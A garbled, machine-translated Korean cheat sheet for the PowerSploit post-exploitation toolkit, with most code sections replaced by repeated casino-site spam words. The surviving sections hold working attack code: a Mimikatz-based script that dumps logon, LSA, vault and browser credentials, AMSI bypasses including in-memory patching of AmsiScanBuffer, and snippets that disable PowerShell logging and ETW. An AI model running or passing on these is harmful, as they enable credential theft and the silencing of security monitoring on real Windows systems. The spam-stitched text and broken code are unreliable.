PowerSploit 열 시트¶
제품정보¶
PowerSploit는 Microsoft PowerShell 모듈의 컬렉션으로, 모든 단계의 평가에서 aid 침투 테스터에 사용할 수 있습니다. PowerSploit는 다음과 같은 모듈로 구성되어 있습니다. CodeExecution, ScriptModification, Persistence, AntivirusBypass, Exfiltration, Mayhem, Privesc 및 Recon. 각 단위는 포스트 폭발 활동을 위한 각종 기능을 제공하는 몇몇 기능을 포함합니다.
· Warning: PowerSploit만 사용하거나 테스트할 수 있는 명시적인 권한이 있습니다. 무단 사용은 서비스 또는 지역 법률에 위반할 수 있습니다.
설치하기¶
GitHub에서 다운로드¶
카지노사이트
Git 복제¶
카지노사이트
수입 모듈¶
카지노사이트
Bypass 실행 정책¶
카지노사이트
Recon 단위¶
PowerView 기능¶
카지노사이트
고급 PowerView 쿼리¶
카지노사이트
세션 및 로컬 Admin Enumeration¶
카지노사이트
ACL 및 권한¶
카지노사이트
Privesc 모듈 (PowerUp)¶
기본 특전¶
카지노사이트
서비스 Exploitation¶
카지노사이트
사이트맵 채용 정보¶
ο 회원 관리
레지스트리 폭발¶
카지노사이트
Persistence 단위¶
등록 관리¶
카지노사이트
WMI 지속¶
카지노사이트
사용자 Hunting¶
카지노사이트
코드Execution 모듈¶
DLL 주입¶
카지노사이트
메모리 실행¶
카지노사이트
Exfiltration 모듈¶
자료 Exfiltration¶
카지노사이트
Credential 수확¶
카지노사이트
AntivirusBypass 모듈¶
AV 증발¶
오프화이트
엠에디터 플러그 인 참조:ScriptModification 모듈¶
스크립트 Obfuscation¶
카지노사이트
Mayhem 단위¶
시스템 Disruption¶
오프화이트
고급 기술¶
채용정보¶
카지노사이트
ASREP로스팅¶
카지노사이트
골든 티켓 공격¶
카지노사이트
실버 티켓 공격¶
카지노사이트
DCSync 공격¶
카지노사이트
자동화 스크립트¶
도메인 Enumeration 스크립트¶
카지노사이트
Privilege 확장 본문 바로가기¶
```powershell
!/usr/bin/env powershell¶
PowerSploit Privilege Escalation Check¶
param( [string]$OutputFile = "C:\temp\privesc_results.txt" )
Import PowerUp¶
Import-Module .\Privesc\PowerUp.ps1
Write-Host "[+] Starting privilege escalation checks..."
try \\{ # Run all checks and save to file Invoke-AllChecks|Tee-Object -FilePath $OutputFile
Write-Host "[+] Privilege escalation checks completed"
Write-Host "[+] Results saved to: $OutputFile"
# Check for immediate wins
$results = Get-Content $OutputFile
if ($results -match "Unquoted Service Path") \\\\{
Write-Host "[!] FOUND: Unquoted service paths - potential privilege escalation!"
\\\\}
if ($results -match "Modifiable Service") \\\\{
Write-Host "[!] FOUND: Modifiable services - potential privilege escalation!"
\\\\}
if ($results -match "AlwaysInstallElevated") \\\\{
Write-Host "[!] FOUND: AlwaysInstallElevated enabled - potential privilege escalation!"
\\\\}
\\} catch \\{ Write-Error "[-] Privilege escalation checks failed: \((\)_.Exception.Message)" \\} ```의 경우
Credential Harvesting 스크립트¶
```powershell
!/usr/bin/env powershell¶
PowerSploit Credential Harvesting Script¶
param( [string]$OutputDir = "C:\temp\creds" )
Create output directory¶
if (!(Test-Path $OutputDir)) \\{ New-Item -ItemType Directory -Path $OutputDir -Force \\}
Import modules¶
Import-Module .\Exfiltration\Exfiltration.psd1 Import-Module .\CodeExecution\CodeExecution.psd1
Write-Host "[+] Starting credential harvesting..."
try \\{ # Mimikatz - dump credentials Write-Host "[+] Running Mimikatz..." Invoke-Mimikatz -Command "sekurlsa::logonpasswords"|Out-File "\(OutputDir\logonpasswords.txt" Invoke-Mimikatz -Command "sekurlsa::wdigest"|Out-File "\)OutputDir\wdigest.txt" Invoke-Mimikatz -Command "sekurlsa::kerberos"|Out-File "\(OutputDir\kerberos.txt" Invoke-Mimikatz -Command "sekurlsa::tspkg"|Out-File "\)OutputDir\tspkg.txt"
# Registry secrets
Write-Host "[+] Extracting registry secrets..."
Get-LSASecret|Out-File "$OutputDir\lsa_secrets.txt"
Get-CachedGPPPassword|Out-File "$OutputDir\gpp_passwords.txt"
# Vault credentials
Write-Host "[+] Extracting vault credentials..."
Get-VaultCredential|Out-File "$OutputDir\vault_creds.txt"
# Browser credentials
Write-Host "[+] Extracting browser credentials..."
Get-ChromeDump|Out-File "$OutputDir\chrome_creds.txt"
Get-FirefoxDump|Out-File "$OutputDir\firefox_creds.txt"
Write-Host "[+] Credential harvesting completed"
Write-Host "[+] Results saved to: $OutputDir"
\\} catch \\{ Write-Error "[-] Credential harvesting failed: \((\)_.Exception.Message)" \\} ```에 대하여
Evasion 기술¶
AMSI 우회¶
```powershell
Method 1: Reflection¶
\(a = [Ref].Assembly.GetTypes() | | \(a | ForEach-Object \\\\{\)_.GetMethods() | ForEach-Object \\\\{if(\)_.Name -like "AmsiInitialize") \\{\(_.Invoke(\)null, @($null, 0))\\}\\}\\} | |
Method 2: Memory patching¶
$Win32 = @" using System; using System.Runtime.InteropServices; public class Win32 \\{ [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); \\} "@
Add-Type $Win32 $LoadLibrary = Win32::LoadLibrary("amsi.dll") \(Address = [Win32]::GetProcAddress(\)LoadLibrary, "AmsiScanBuffer") $p = 0
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
```의 경우
PowerShell 로깅 우회¶
```powershell
Disable PowerShell logging¶
$GPO = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static') \(GPO.SetValue(\)null, @\\{\\})
Disable script block logging¶
$settings = [System.Management.Automation.Utils]::GetGroupPolicySettings() $settings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0 $settings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0 ```에 대하여
기타 패스워드¶
```powershell
Disable ETW¶
$Provider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider') \(etwProvider = \(Provider.GetField('etwProvider','NonPublic,Static').GetValue(\)null) [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue(\)etwProvider,0) ```의 경우
통합 예제¶
Cobalt Strike 통합¶
카지노사이트
Empire 통합¶
카지노사이트
Metasploit 통합¶
카지노사이트
문제 해결¶
실행 정책 문제¶
카지노사이트
AMSI 탐지¶
카지노사이트
Module 수입 문제¶
카지노사이트
네트워크 연결 문제¶
```powershell
Test network connectivity¶
Test-NetConnection -ComputerName "target" -Port 445
Check firewall¶
Get-NetFirewallRule|Where-Object \\{$_.Enabled -eq "True"\\}
Use alternative ports¶
Get-DomainController -Server "dc.domain.com:389" ```의 경우
지원하다¶
- Official PowerSploit 저장소
- PowerSploit 문서
- PowerView 열 시트
- PowerUp 문서
- 액티브 디렉토리 보안
- PowerShell 제국
- BloodHound 통합
*이 속임수 시트는 Windows 침투 테스트 및 포스트 폭발에 대한 PowerSploit을 사용하는 포괄적 인 참조를 제공합니다. 항상 이 도구를 사용하기 전에 적절한 권한이 있습니다. *필수